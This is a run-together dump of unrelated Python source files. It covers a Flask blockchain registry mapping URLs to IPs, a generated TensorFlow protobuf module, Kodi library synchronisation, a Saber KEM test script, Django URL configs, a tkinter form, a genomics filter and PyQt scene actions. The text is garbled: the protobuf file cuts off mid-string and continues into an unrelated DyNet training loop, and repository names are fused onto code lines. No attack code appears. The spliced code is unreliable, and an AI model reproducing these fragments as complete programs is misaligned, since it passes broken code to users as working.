blockchain.triggered_flood_chain() return jsonify(response) , 200 @app.route('/transactions', methods=['GET']) def full_transactions(): return jsonify({ 'transactions': blockchain.current_transactions }) @app.route('/transactions/new', methods=['POST']) def new_transaction(): values = request.get_json() required = ['url', 'ip'] if not all(k in values for k in required): return 'missing values' , 400 if blockchain.redundancy(values['url']): return jsonify({'message': 'url already taken.'}) if urlparse(values['url']).netloc != "": index = blockchain.new_transaction(urlparse(values['url']).netloc , values['ip']) response = {'message' : f'Transaction will be added to Block {index} '} return jsonify(response) , 201 else: return jsonify({"message": "Invalid url!"}), 201 @app.route('/chain' , methods=['GET']) def full_chain(): response={ 'chain': blockchain.chain, 'length': len(blockchain.chain), } return jsonify(response), 200 @app.route('/nodes', methods=['GET']) def full_nodes(): return jsonify({ 'nodes': list(blockchain.nodes) }) @app.route('/nodes/register', methods= ['POST']) def register_nodes(): values = request.get_json() nodes = values.get('nodes') flag = values.get('flag') print(flag) if nodes is None: return 'Error: Please supply a valid list of nodes' , 400 for node in nodes: blockchain.register_node(node, flag) response = { 'message' : 'new nodes have been added', 'total_nodes': list(blockchain.nodes) } blockchain.resolve_conflicts() with open("data/"+str(port)+"_chain.json", "w") as file: json.dump(blockchain.chain, file) return jsonify(response) , 201 @app.route('/nodes/resolve', methods=['GET']) def consensus(): replaced = blockchain.resolve_conflicts() if replaced: with open("data/"+str(port)+"_chain.json", "w") as file: json.dump(blockchain.chain, file) response = { 'message': 'Our chain was replaced', 'new_chain': blockchain.chain, } else: response = { 'message': 
'Our chain is authoritative', 'chain': blockchain.chain, } return jsonify(response), 200 @app.route('/url/', methods=['GET']) def red(url): print(url) for block in reversed(blockchain.chain): for i in block['transactions']: if i['url'] == str(url): return jsonify({"Flag": True, "IP": i['ip']}) return jsonify({"Flag": False, "Message": "Error 404! Not found"}) if __name__ == "__main__": port = int(input('Enter port: ')) try: with open("data/"+str(port)+"_chain.json", "r") as file: blockchain.chain = json.loads(file.read()) except: file = open("data/"+str(port)+"_chain.json", "w") file.close() app.run(host='0.0.0.0', port=port, debug=True)wwongkamjan/dipnet_press # Generated by the protocol buffer compiler. DO NOT EDIT! # source: diplomacy_tensorflow/core/protobuf/tensorflow_server.proto import sys _b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1')) from google.protobuf import descriptor as _descriptor from google.protobuf import message as _message from google.protobuf import reflection as _reflection from google.protobuf import symbol_database as _symbol_database # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() from diplomacy_tensorflow.core.protobuf import config_pb2 as diplomacy__tensorflow_dot_core_dot_protobuf_dot_config__pb2 from diplomacy_tensorflow.core.protobuf import cluster_pb2 as diplomacy__tensorflow_dot_core_dot_protobuf_dot_cluster__pb2 DESCRIPTOR = _descriptor.FileDescriptor( name='diplomacy_tensorflow/core/protobuf/tensorflow_server.proto', package='diplomacy.tensorflow', syntax='proto3', serialized_options=_b('\n\032org.tensorflow.distruntimeB\014ServerProtosP\001Z 100: batch_loss = dy.esum(losses) batch_loss.forward() batch_loss.backward() self.trainer.update() dy.renew_cg() losses = [] errors = (errors/len(data))*100 if len(losses)>0: batch_loss= dy.esum(losses) batch_loss.forward() batch_loss.backward() self.trainer.update() dy.renew_cg() if i%10==0: print "Epoch: %d Loss: %.3f - Error: %.1f"%(i, total_loss, errors) if prev_loss < total_loss: loss_not_improving += 1 if loss_not_improving > 10 or i > self.epochs: break prev_loss = total_loss 1-10 #!/usr/bin/env python3 import datetime import subprocess import sys import serial import numpy as np from config import Settings testType = "test" iterations = 1 ntests = 10 schemeList = ["lightsaber", "saber", "firesaber"] impleList = ["speed", "speedstack", "stack", "_32bit"] cpu = "m3" def getBinary(scheme, impl): return f"elf/crypto_kem_{scheme}_{impl}_{testType}.elf" def getFlash(binary): return f"openocd -f nucleo-f2.cfg -c \"program {binary} reset exit\" " def makeAll(): subprocess.check_call(f"make clean", shell=True) subprocess.check_call(f"make -j4 ITERATIONS={iterations}", shell=True) def test(scheme, impl): binary = getBinary(scheme, impl) try: subprocess.check_call(getFlash(binary), shell=True) except: print("st-flash failed --> retry") return test(scheme, impl) with serial.Serial(Settings.SERIAL_DEVICE, Settings.BAUD_RATE, timeout=10) as dev: log = b"" while True: device_output = dev.read() if device_output == b'': print("timeout --> retry") return test(scheme, impl) sys.stdout.buffer.write(device_output) sys.stdout.flush() log += device_output if device_output == b'#': break log = log.decode(errors="ignore") assert log.count("ERROR") == 0 and log.count("OK") == ntests makeAll() for scheme in schemeList: for imple in impleList: test(scheme, cpu + imple) rafaelurben/django-onlinevarsonlinevars/urls.py from django.urls import path from django.contrib.auth import views as 
auth_views from django.conf import settings from . import views ####################### app_name = 'onlinevars' urlpatterns = [ path('api/v1/', views.api_v1, name="api-v1"), path('chat/', views.chat_start, name="chat-start"), path('chat///', views.chat, name="chat") ] import tkinter # organizando e trabalhando com duas frames # - - ---------------------------------------------------------------------------------- # funções # --------------------------------------------------------------------------------------- # GUI root = tkinter.Tk() root.title("Aplicação") # ------------------------------------------------------------------------------------ # widget frame_nome = tkinter.Frame(root) frame_end = tkinter.Frame(root) label_nome = tkinter.Label(frame_nome, text='Nome:') label_sobren = tkinter.Label(frame_nome, text='Sobrenome:') label_rua = tkinter.Label(frame_end, text='Rua:') label_cidade = tkinter.Label(frame_end, text='Cidade:') text_nome = tkinter.Entry(frame_nome) text_sobren = tkinter.Entry(frame_nome) text_rua = tkinter.Entry(frame_end) text_cidade = tkinter.Entry(frame_end) cmd_salvar = tkinter.Button(root, text='Salvar') # ------------------------------------------------------------------------------------ # layout label_nome.grid(row=0, column=0) label_sobren.grid(row=1, column=0) text_nome.grid(row=0, column=1) text_sobren.grid(row=1, column=1) label_rua.grid(row=0, column=0) label_cidade.grid(row=1, column=0) text_rua.grid(row=0, column=1) text_cidade.grid(row=1, column=1) frame_nome.grid(row=0, column=0) frame_end.grid(row=0, column=1) cmd_salvar.grid() root.mainloop()#!/usr/bin/env python3 import time import os from kodijsonrpc import KodiJSONClient from jsonrpcclient.exceptions import ReceivedErrorResponse, ReceivedNoResponse from utils import logger class KodiHost(KodiJSONClient): def __init__(self, name, hostname, port, username, password, always_on, show_notifications): self.name = name self.scanned = False self.always_on = always_on self.show_notifications = show_notifications super().__init__(hostname, port, username, password) @property def isAlive(self): try: return self.JSONRPC.Ping() == 'pong' # pylint: disable=no-member except Exception: return False @property def inUse(self): try: response = self.Player.GetActivePlayers() # pylint: disable=no-member except ReceivedErrorResponse: return True if len(response) > 0: return True return False def notify(self, msg, title='Kodi Library Manager'): imageURL = 'https://github.com/jsaddiction/KodiLibrarian/raw/main/img/' if title.lower() == 'sonarr': imageURL += 'Sonarr.png' elif title.lower() == 'radarr': imageURL += 'Radarr.png' elif title.lower() == 'lidarr': imageURL += 'Lidarr.png' else: imageURL += 'KodiLibrarian.png' params = { 'title': title, 'message': msg, 'displaytime': 5000, 'image': imageURL } self.GUI.ShowNotification(params) # pylint: disable=no-member class Librarian(): TIMEOUT = 20 log = logger.get_log('Librarian') def __init__(self, hostList, update_while_playing=False): self.hosts = [] self.update_while_playing = update_while_playing for host in hostList: client = KodiHost( name=host['name'], hostname=host['hostname'], port=host['port'], username=host['username'], password=host['password'], always_on=host['always_on'], show_notifications=host['show_notifications'], ) if client.isAlive: self.hosts.append(client) else: self.log.warning('Failed to establish connection with {}.'.format(client.name)) def _modifyWatchedState(self, watchedState): # Create modified watched state newWatchedState = 
dict(watchedState) newWatchedState['lastplayed'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime()) newWatchedState['playcount'] += 1 return newWatchedState def cleanLibrary(self, content=None): params = { 'showdialogs': False, 'content': content } if not content or not content in ['movies', 'tvshows']: del params['content'] for host in self.hosts: self.log.info('Initiating clean of {} on host: {}'.format(content, host.name)) try: response = host.VideoLibrary.Clean(params) except (ReceivedErrorResponse, ReceivedNoResponse): pass if not response == 'OK': self.log.warning('Incorrect response received from Host: {} Response: {}. Trying next host.'.format(host.name, response)) continue return ######################## TV Show methods ####################### def _getTVShowID(self, path): # returns int tvshow id of show located within path if not path.endswith('/'): path += '/' showList = self._getTVShows() for show in showList: if show['file'] == path: return show['tvshowid'] return None def _getTVShows(self): # returns list of all tvshows in the library params = { 'properties': ['file'] } for host in self.hosts: try: response = host.VideoLibrary.GetTVShows(params) # pylint: disable=no-member except (ReceivedErrorResponse, ReceivedNoResponse) as e: self.log.warning('Host: {} Failed to get TVShow list. Error: {}'.format(host.name, e)) response = None if response and 'tvshows' in response: return response['tvshows'] return [] def _getEpisodeID(self, tvshowID, episodePath): # returns episodeID of episode located at episodePath if not tvshowID: return None episodes = self._getEpisodes(tvshowID) # return episodeid if only one was found if len(episodes) == 1: return episodes[0]['episodeid'] # return episode id of anything in the list matches path excluding extension for episode in episodes: if os.path.splitext(episode['file'])[0] == os.path.splitext(episodePath)[0]: return episode['episodeid'] return None def _getEpisodes(self, tvshowID): # returns list of all episodes of a tvshow params = { 'tvshowid': int(tvshowID), 'properties': ['lastplayed', 'playcount', 'file', 'season', 'episode', 'tvshowid', 'showtitle'] } for host in self.hosts: try: response = host.VideoLibrary.GetEpisodes(params) # pylint: disable=no-member except (ReceivedErrorResponse, ReceivedNoResponse) as e: self.log.warning('Host: {} Failed to get episodes for tvshowID: {} Error: {}'.format(host.name, tvshowID, e)) response = None if response and 'episodes' in response: return response['episodes'] return [] def _getTVShowDetails(self, tvshowID): if not tvshowID: return None params = { 'tvshowid': tvshowID, 'properties': ['file'] } for host in self.hosts: try: response = host.VideoLibrary.GetTVShowDetails(params) except (ReceivedErrorResponse, ReceivedNoResponse) as e: self.log.warning('Host: {} Failed to get TVShowDetails for tvshowid: {} Error: {}'.format(host.name, tvshowID, e)) continue if response and 'tvshowdetails' in response: return response['tvshowdetails'] return None def _getEpisodeDetails(self, episodeID): if not episodeID: return None params = { 'episodeid': int(episodeID), 'properties': ['lastplayed', 'playcount', 'file', 'season', 'episode', 'tvshowid', 'showtitle', 'dateadded'] } for host in self.hosts: try: response = host.VideoLibrary.getEpisodeDetails(params) # pylint: disable=no-member except (ReceivedErrorResponse, ReceivedNoResponse) as e: self.log.warning('Host: {} Failed to get episode details for episodeID: {} Error: {}'.format(host.name, episodeID, e)) response = None if response and 'episodedetails' in 
response: return response['episodedetails'] return None def _getEpisodeWatchedState(self, episodeID=None, episodeDetails=None): # returns object contianing watches status of an episode given either episodeid or episode details if episodeID: details = self._getEpisodeDetails(episodeID) elif episodeDetails: details = episodeDetails else: return None return {k:v for k, v in details.items() if k in ['playcount', 'lastplayed', 'episodeid', 'dateadded']} def _toggleEpisodeWatchedState(self, episodeID): # toggle watchedstate on each nonscanned host watchedState = self._getEpisodeWatchedState(episodeID) newWatchedState = self._modifyWatchedState(watchedState) for host in self.hosts: if not host.scanned: self._setEpisodeWatchedState(host, newWatchedState) self._setEpisodeWatchedState(host, watchedState) def _setEpisodeWatchedState(self, host, watchedState): if not watchedState: return None # Get what is currently in the library oldWatchedState = self._getEpisodeWatchedState(watchedState['episodeid']) # check if we need a watched state change if oldWatchedState == watchedState: return True self.log.debug('Setting episode watched state to {} Host: {}'.format(watchedState, host.name)) # Initiate the changes try: response = host.VideoLibrary.SetEpisodeDetails(watchedState) # pylint: disable=no-member except (ReceivedErrorResponse, ReceivedNoResponse) as e: self.log.warning('Failed to set watched state watchedState: {} Error: {}'.format(watchedState, e)) response = None if not response == 'OK': self.log.warning('Incorrect response received from Host: {} Response: {}. Trying next host.'.format(host.name, response)) return False t = 0 while t < self.TIMEOUT * 10: time.sleep(0.1) t += 1 newWatchedState = self._getEpisodeWatchedState(watchedState['episodeid']) if newWatchedState and not newWatchedState == oldWatchedState: self.log.debug('Setting watched state complete. Took {}s'.format(t/10)) return True self.log.warning('Host: {} Timed out after {}s while setting episode watched state. 
Trying next host.'.format(host.name, t/10)) return False def _removeEpisode(self, episodeID): # Remove given episode and return true if success self.log.debug('Removing episodeID: {}'.format(episodeID)) params = { 'episodeid': episodeID } for host in self.hosts: try: response = host.VideoLibrary.RemoveEpisode(params) except (ReceivedErrorResponse, ReceivedNoResponse) as e: response = None if not response == 'OK': self.log.warning('Host: {} Failed to remove episodeid: {} Error: {}'.format(host.name, episodeID, e)) continue return True def _refreshEpisode(self, episodeID, episodePath): # store watched state for later # remove any episode that matches tvshowid, season, episode (may be more than one) # initiate a scan on tvshow folder # return new episodeID self.log.debug('Refreshing episodeID: {}'.format(episodeID)) # Retain details of given episodeid episodeDetails = self._getEpisodeDetails(episodeID) tvShowDetails = self._getTVShowDetails(episodeDetails['tvshowid']) watchedState = self._getEpisodeWatchedState(episodeDetails=episodeDetails) # Get all episodes matching tvshowid, season, episode episodeIDs = [episode['episodeid'] for episode in self._getEpisodes(episodeDetails['tvshowid']) if episode['season'] == episodeDetails['season'] and episode['episode'] == episodeDetails['episode']] # remove all found episodes for epID in episodeIDs: self._removeEpisode(epID) # Initiate scan of show directory newEpisodeID = self._scanTVShowDirectory(tvShowDetails['file'], episodePath) # Set previously collected watched state of new episode watchedState['episodeid'] = newEpisodeID for host in self.hosts: if self._setEpisodeWatchedState(host, watchedState): return newEpisodeID return None def _scanTVShowDirectory(self, showDirectory, episodePath): # Scan tvshow directory and return new episodeID self.log.debug('Scanning show directory {}'.format(showDirectory)) showID = self._getTVShowID(showDirectory) for host in self.hosts: if not self.update_while_playing and host.inUse: self.log.info('{} is currently playing a video. Skipping update.'.format(host.name)) continue try: response = host.VideoLibrary.Scan(directory=showDirectory) # pylint: disable=no-member except (ReceivedErrorResponse, ReceivedNoResponse): pass if not response == 'OK': self.log.warning('Incorrect response received from Host: {} Response: {}. Trying next host.'.format(host.name, response)) continue t = 0 while t < self.TIMEOUT * 10: time.sleep(0.1) t += 1 episodeID = self._getEpisodeID(showID, episodePath) if episodeID: host.scanned = True self.log.debug('Scan complete. EpisodeID: {} Took {}s'.format(episodeID, t/10)) return episodeID self.log.warning('Host: {} Timed out after {}s while scanning show directory. Trying next host.'.format(host.name, t/10)) return None def _scanNewTVShow(self, showDirectory, episodePath): # Full library scan and return new episodeID self.log.debug('Scanning new Tv Show {}. This may take a while.'.format(showDirectory)) for host in self.hosts: if not self.update_while_playing and host.inUse: self.log.info('{} is currently playing a video. Skipping update.'.format(host.name)) continue try: response = host.VideoLibrary.Scan() # pylint: disable=no-member except (ReceivedErrorResponse, ReceivedNoResponse): pass if not response == 'OK': self.log.warning('Incorrect response received from Host: {} Response: {}. 
Trying next host.'.format(host.name, response)) continue t = 0 while t < self.TIMEOUT * 60: time.sleep(1) t += 1 episodeID = self._getEpisodeID(self._getTVShowID(showDirectory), episodePath) if episodeID: host.scanned = True self.log.debug('Scan complete. EpisodeID: {} Took {}s'.format(episodeID, t)) return episodeID self.log.warning('Host: {} Timed out after {}s while scanning entire library. Trying next host.'.format(host.name, t/10)) # Main method used to update / add new episode / tvshow def updateTVShow(self, episodePath, showDirectory): showID = self._getTVShowID(showDirectory) episodeID = self._getEpisodeID(showID, episodePath) # Refresh or add this episode to the library if episodeID: # Episode and show exists. Refresh episode. Return updated episodeID. episodeID = self._refreshEpisode(episodeID, episodePath) notificationStr = 'Updated Episode ' elif showID: # Show exists but not episode. Scaning show directory for new content. Return new episodeID. episodeID = self._scanTVShowDirectory(showDirectory, episodePath) notificationStr = 'Added Episode ' else: # Neither show nor episode exist. Preform full library scan. Return new episodeID. episodeID = self._scanNewTVShow(showDirectory, episodePath) notificationStr = 'Added TV Show ' # Toggle watched state of this new/updated episode self._toggleEpisodeWatchedState(episodeID) # Send notifications episodeDetails = self._getEpisodeDetails(episodeID) notificationStr += '"{}" S{}E{} "{}"'.format(episodeDetails['showtitle'], episodeDetails['season'], episodeDetails['episode'], episodeDetails['label']) for host in self.hosts: if host.show_notifications: self.log.info('Sending notification to {}. Message: "{}"'.format(host.name, notificationStr)) host.notify(notificationStr, 'Sonarr') ######################## Movie methods ####################### def _getMovieID(self, title, path): if not title or not path: return params = { 'filter': {'operator': 'is', 'field': 'title', 'value': title}, 'properties': ['file'] } for host in self.hosts: try: response = host.VideoLibrary.GetMovies(params) except (ReceivedErrorResponse, ReceivedNoResponse) as e: self.log.warning('Host: {} Failed to get movieid for {}. 
Error: {}'.format(host.name, title, e)) response = None if response and 'movies' in response: # if more than one movie was found parse through and pick one based on path ignoring extension for movie in response['movies']: if os.path.splitext(movie['file'])[0] == os.path.splitext(path)[0]: return movie['movieid'] return None def _getMovieDetails(self, movieID): if not movieID: return None params = { 'movieid': int(movieID), 'properties': ['file', 'lastplayed', 'playcount', 'year', 'dateadded'] } for host in self.hosts: self.log.debug('Getting Movie details from host: {} for movieID: {}'.format(host.name, movieID)) try: response = host.VideoLibrary.getMovieDetails(params) except (ReceivedErrorResponse, ReceivedNoResponse) as e: self.log.warning('Host: {} Failed to get Movie details movieID: {} Error: {}'.format(host.name, movieID, e)) response = None if response and 'moviedetails' in response: self.log.debug('moviedetails: {}'.format(response['moviedetails'])) return response['moviedetails'] return None def _getMovieIDs(self, title): if not title: return [] params = { 'properties': ['file', 'lastplayed', 'playcount', 'year'], 'filter': {'operator': 'is', 'field': 'title', 'value': title} } for host in self.hosts: try: response = host.VideoLibrary.GetMovies(params) except (ReceivedErrorResponse, ReceivedNoResponse) as e: self.log.warning('Host: {} Failed to get Movie list matching {} Error: {}'.format(host.name, title, e)) return [] if response and 'movies' in response: return response['movies'] def _removeMovie(self, movieID): self.log.debug('Removing movieID: {}'.format(movieID)) params = { 'movieid': movieID } for host in self.hosts: try: response = host.VideoLibrary.RemoveMovie(params) except (ReceivedErrorResponse, ReceivedNoResponse) as e: response = None if not response == 'OK': self.log.warning('Host: {} Failed to remove movieID: {} Error: {}'.format(host.name, movieID, e)) continue return True def _refreshMovie(self, movieID, movieDirectory): # Save watched state of movie currently in library # Remove movie currently in library # Rescan that directory # Set watched state of new movie to previously recorded value # return the new movie id self.log.info('Refreshing movieID: {}'.format(movieID)) # Save watched state and movie details of movie currently in library movieDetails = self._getMovieDetails(movieID) watchedState = self._getMovieWatchedState(movieDetails=movieDetails) # Get all movies matching title and directory movieIDs = [movie['movieid'] for movie in self._getMovieIDs(movieDetails['label']) if movieDirectory in movie['file']] # Remove movie in the library (could be more than one instance of the same movie) for mID in movieIDs: self._removeMovie(mID) # Rescan directory newMovieID = self._scanNewMovie(movieDetails['label'], movieDirectory, movieDetails['file']) # Set watched state watchedState['movieid'] = newMovieID for host in self.hosts: if self._setMovieWatchedState(host, watchedState): return newMovieID return None def _scanNewMovie(self, title, movieDirectory, moviePath): self.log.debug('Initiating directory scan for new movie. directory: "{}"'.format(movieDirectory)) if not movieDirectory.endswith('/'): movieDirectory += '/' for host in self.hosts: if not self.update_while_playing and host.inUse: self.log.info('{} is currently playing a video. 
Skipping update.'.format(host.name)) continue try: response = host.VideoLibrary.Scan(directory=movieDirectory) except (ReceivedErrorResponse, ReceivedNoResponse): pass if not response == 'OK': self.log.warning('Incorrect response received from Host: {} Response: {}. Trying next host.'.format(host.name, response)) continue t = 0 while t < self.TIMEOUT * 10: time.sleep(0.1) t += 1 movieID = self._getMovieID(title, moviePath) if movieID: self.log.debug('Directroy Scan complete. New movieID: {} Took {}s'.format(movieID, t/10)) host.scanned = True return movieID self.log.warning('Host: {} Timed out after {}s while scanning new movie. Trying next host.'.format(host.name, t/10)) self.log.warning('All hosts failed to scan by directory. Initiating full library scan.') for host in self.hosts: if not self.update_while_playing and host.inUse: self.log.info('{} is currently playing a video. Skipping update.'.format(host.name)) continue try: response = host.VideoLibrary.Scan() except (ReceivedErrorResponse, ReceivedNoResponse): pass if not response == 'OK': self.log.warning('Incorrect response received from Host: {} Response: {}. Trying next host.'.format(host.name, response)) continue t = 0 while t < self.TIMEOUT * 60: time.sleep(1) t += 1 movieID = self._getMovieID(title, moviePath) if movieID: self.log.debug('Full scan complete. New movieID: {} Took {}s'.format(movieID, t)) host.scanned = True return movieID self.log.warning('Host: {} Timed out after {}s while scanning new movie. Trying next host.'.format(host.name, t)) self.log.warning('All hosts failed to scan "{}" {}. Aborting.'.format(title, moviePath)) def _getMovieWatchedState(self, movieID=None, movieDetails=None): if movieID: details = self._getMovieDetails(movieID) elif movieDetails: details = movieDetails else: return None return {k:v for k, v in details.items() if k in ['playcount', 'lastplayed', 'movieid', 'dateadded']} def _setMovieWatchedState(self, host, watchedState): if not watchedState: return None # Get what is currently in the library oldWatchedState = self._getMovieWatchedState(watchedState['movieid']) # Check if we need to set watched state if oldWatchedState == watchedState: return True self.log.debug('Setting movie watched state to {} Host: {}'.format(watchedState, host.name)) # Initiate the changes try: response = host.VideoLibrary.SetMovieDetails(watchedState) # pylint: disable=no-member except (ReceivedErrorResponse, ReceivedNoResponse) as e: self.log.warning('Failed to set watched state watchedState: {} Error: {}'.format(watchedState, e)) if not response == 'OK': self.log.warning('Incorrect response received from Host: {} Response: {}.'.format(host.name, response)) return t = 0 while t < self.TIMEOUT * 10: time.sleep(0.1) t += 1 newWatchedState = self._getMovieWatchedState(watchedState['movieid']) if newWatchedState and not oldWatchedState == newWatchedState: self.log.debug('Setting watched state complete. 
Took {}s'.format(t/10)) return self.log.warning('Host: {} Timed out after {}s while setting movie watched state.'.format(host.name, t/10)) def _toggleMovieWatchedState(self, movieID): for host in self.hosts: if not host.scanned: watchedState = self._getMovieWatchedState(movieID) newWatchedState = self._modifyWatchedState(watchedState) self.log.info('Toggling watched state on host: {}'.format(host.name)) self._setMovieWatchedState(host, newWatchedState) self._setMovieWatchedState(host, watchedState) # Main method used to update / add new movie def updateMovie(self, title, movieDirectory, moviePath): movieID = self._getMovieID(title, moviePath) if not movieID: movieID = self._scanNewMovie(title, movieDirectory, moviePath) notificationStr = 'Added New Movie ' else: movieID = self._refreshMovie(movieID, movieDirectory) notificationStr = 'Updated Movie ' # Toggle watched state on remaining hosts self._toggleMovieWatchedState(movieID) # Send notifications movieDetails = self._getMovieDetails(movieID) notificationStr += '"{}" ({})'.format(movieDetails['label'], movieDetails['year']) for host in self.hosts: if host.show_notifications: self.log.info('Sending notification to {}. Message: "{}"'.format(host.name, notificationStr)) host.notify(notificationStr, 'Radarr')krasileva-group/tgac-map #!/usr/bin/env python from __future__ import division import sys import csv from collections import Counter, defaultdict fn = sys.argv[1] with open(fn) as fi: # there are two .map-files in group-tg/reference/wheat-geneticbin-map/ gmap = {line.split('\t')[0]: tuple(line.strip().split('\t')[1:3]) for line in fi} cmap = Counter() dmap = defaultdict(Counter) fi = sys.stdin reader = csv.reader(fi, delimiter='\t') for row in reader: # print row if not row[0].startswith('#'): evalue = float(row[10]) if evalue > 1e-5: continue alen = float(row[3]) qlen = float(row[12]) if alen < 1000: #200 or alen / qlen < 0.75: continue pid = float(row[2]) if pid < 98.5: #85.0: continue cmap[tuple(row[:2])] += 1 dmap[row[0]][row[1]] += 1 # make sure to only use markers that align to one scaffold for k in dmap: if len(dmap[k]) == 1: cmap[(k, dmap[k].keys()[0])] = dmap[k].values()[0] for k in sorted(cmap): chr_, bin_ = gmap.get(k[0], (None, None)) if chr_ and bin_: print '\t'.join(map(str, [k[0], k[1], cmap[k], chr_, bin_])) from django.contrib import admin from django.contrib.auth.decorators import login_required from django.urls import path, include from rest_framework import routers from . 
import views from .views import UpdatePlanView app_name = "backend" router = routers.DefaultRouter() router.register(r'plans', views.PlanView, 'plan') urlpatterns = [ path('api/', include(router.urls)), path('create_plan/', login_required(views.CreatePlanView.as_view()), name='create_plan'), path('update/plan//', login_required(UpdatePlanView.as_view()), name='plan'), ]zardosht/isar import logging import time from threading import Thread from PyQt5.QtWidgets import QPushButton, QDialog, QLabel, QLineEdit from isar.scene import audioutil, sceneutil from isar.scene.scenemodel import Scene logger = logging.getLogger("isar.events.actions") class Action: # if an action has extra properties, it must set this to true, # and give an implementation for update_action_properties_frame(qt_frame) has_properties = False has_target = True has_single_target = False def __init__(self): self.name = "action" self.scene_id = None self.__target = None self.annotations_model = None self.scenes_model = None self._action_service = None @property def target(self): return self.__target @target.setter def target(self, target): # For debugging only: Added to catch this weired behavior that action target is the action itself! if isinstance(target, Action): raise RuntimeError() if not self.__class__.is_action_target_valid(target): logger.error("Action target is invalid: {}. Return.".format(target)) return self.__target = target def run(self): # must be implemented by subclasses pass @classmethod def is_action_target_valid(cls, action_target): if not cls.has_target: return True else: if action_target is None: logger.error("action_target is None. Return.") return False if cls.has_single_target: if type(action_target) not in cls.target_types: logger.error("Action target not matching target type of the action. Return.") return False else: if type(action_target) != list: logger.error("Action target not matching target type of the action. Return.") return False type_matches = False for target in action_target: type_matches = False for target_type in cls.target_types: if isinstance(target, target_type): type_matches = True break if not type_matches: logger.error("Action target not matching target type of the action. Return.") return False return True def __getstate__(self): state = self.__dict__.copy() del state["annotations_model"] del state["scenes_model"] del state["_action_service"] return state def __setstate__(self, state): self.__init__() self.__dict__.update(state) class ToggleAnnotationVisibilityAction(Action): """ Toggles the visibility of multiple annotations. """ from isar.scene.annotationmodel import Annotation target_types = [Annotation] def __init__(self): super().__init__() def run(self): if self.target is None: logger.warning("self.target is None. Return") return if type(self.target) != list: logger.warning("self.target is not a list. Return") return for annotation in self.target: is_visible = annotation.show.get_value() annotation.show.set_value(not is_visible) class ShowAnnotationAction(ToggleAnnotationVisibilityAction): def __init__(self): super().__init__() def run(self): if self.target is None: logger.warning("self.target is None. Return") return if type(self.target) != list: logger.warning("self.target is not a list. Return") return for annotation in self.target: annotation.show.set_value(True) class HideAnnotationAction(ToggleAnnotationVisibilityAction): def __init__(self): super().__init__() def run(self): if self.target is None: logger.warning("self.target is None. 
Return") return if type(self.target) != list: logger.warning("self.target is not a list. Return") return for annotation in self.target: annotation.show.set_value(False) class ShowSceneAction(Action): """ Must have a scene as its target """ target_types = [Scene] has_single_target = True def __init__(self): super().__init__() def run(self): if self.target is None: logger.error("self.target is None. Return.") return if type(self.target) == Scene: self.scenes_model.show_scene(self.target.name) else: logger.error("self.target is not a Scene.") class NextSceneAction(Action): """ Next scene in scene navigation sequence """ global_action_name = "Next Scene" has_target = False def __init__(self): super().__init__() def run(self): self.scenes_model.show_next_scene() class PreviousSceneAction(Action): """ Previous scene in scene navigation sequence """ global_action_name = "Previous Scene" has_target = False def __init__(self): super().__init__() def run(self): self.scenes_model.show_previous_scene() class BackSceneAction(Action): """ Back scene. This is added for the cases where user views a scene that is not part of the defined navigation flow. Imagine for example a navigation flow consists of [S1, S2, S3] for S2 we have a scene H1 that shows help, and is shown using an action button. On the help scene (H1), an action button calls the back action to return to S2. This is different from previous scene action, that refers to the previous scene in navigation flow, i.e. S1 """ global_action_name = "Back Scene" has_target = False def __init__(self): super().__init__() def run(self): self.scenes_model.show_back_scene() class StartTimerAction(Action): """ Must have a timer annotation as its target. """ from isar.scene.annotationmodel import TimerAnnotation target_types = [TimerAnnotation] has_single_target = True def __init__(self): super().__init__() def run(self): if self.target is None: logger.error("self.target is None. Return.") return if type(self.target) == StartTimerAction.target_types[0]: self.target.start() else: logger.error("self.target is not TimerAnnotation.") class StopTimerAction(Action): """ Must have a timer annotation as its target. """ from isar.scene.annotationmodel import TimerAnnotation target_types = [TimerAnnotation] has_single_target = True def __init__(self): super().__init__() def run(self): if self.target is None: logger.error("self.target is None. Return.") return if type(self.target) == StopTimerAction.target_types[0]: self.target.stop() else: logger.error("self.target is not TimerAnnotation.") class ResetTimerAction(Action): """ Must have a timer annotation as its target. """ from isar.scene.annotationmodel import TimerAnnotation target_types = [TimerAnnotation] has_single_target = True def __init__(self): super().__init__() self.timer_name = None def run(self): if self.target is None: logger.error("self.target is None. Return.") return if type(self.target) == ResetTimerAction.target_types[0]: self.target.reset() else: logger.error("self.target is not TimerAnnotation.") class StartAudioAction(Action): """ Must have a sound annotation as its target. """ from isar.scene.annotationmodel import AudioAnnotation target_types = [AudioAnnotation] has_single_target = True def __init__(self): super().__init__() self.annotation_name = None def run(self): if self.target is None: logger.error("self.target is None. 
Return.") return if type(self.target) == StartAudioAction.target_types[0]: annotation = self.target audio_file_path = annotation.audio_path.get_value() loop = annotation.loop_playback.get_value() audioutil.play(audio_file_path, loop) else: logger.error("self.target is not AudioAnnotation.") class StopAudioAction(Action): """ Must have a sound annotation as its target. """ from isar.scene.annotationmodel import AudioAnnotation target_types = [AudioAnnotation] has_single_target = True def __init__(self): super().__init__() self.annotation_name = None def run(self): if self.target is None: logger.error("self.target is None. Return.") return if type(self.target) == StopAudioAction.target_types[0]: annotation = self.target audio_file_path = annotation.audio_path.get_value() audioutil.stop(audio_file_path) else: logger.error("self.target is not AudioAnnotation.") class StartVideoAction(Action): """ Must have a video annotation as its target. """ from isar.scene.annotationmodel import VideoAnnotation target_types = [VideoAnnotation] has_single_target = True def __init__(self): super().__init__() def run(self): if self.target is None: logger.error("self.target is None. Return.") return if type(self.target) == StartVideoAction.target_types[0]: self.target.start() else: logger.error("self.target is not VideoAnnotation") class StopVideoAction(Action): """ Must have a video annotation as its target. """ from isar.scene.annotationmodel import VideoAnnotation target_types = [VideoAnnotation] has_single_target = True def __init__(self): super().__init__() def run(self): if self.target is None: logger.error("self.target is None. Return.") return if type(self.target) == StopVideoAction.target_types[0]: self.target.stop() else: logger.error("self.target is not VideoAnnotation") class StartAnimationAction(Action): from isar.scene.annotationmodel import AnimationAnnotation target_types = [AnimationAnnotation] def __init__(self): super().__init__() self.animation_names = None self.exercise = None def run(self): if self.target is None: logger.warning("self.target is None. Return") return if type(self.target) != list: logger.warning("self.target is not a list. Return") return if self.exercise is None: for animation in self.target: animation.start() elif not self.exercise.running: self.exercise.start() class StopAnimationAction(Action): from isar.scene.annotationmodel import AnimationAnnotation target_types = [AnimationAnnotation] def __init__(self): super().__init__() self.animation_names = None self.exercise = None def run(self): if self.target is None: logger.warning("self.target is None. Return") return if type(self.target) != list: 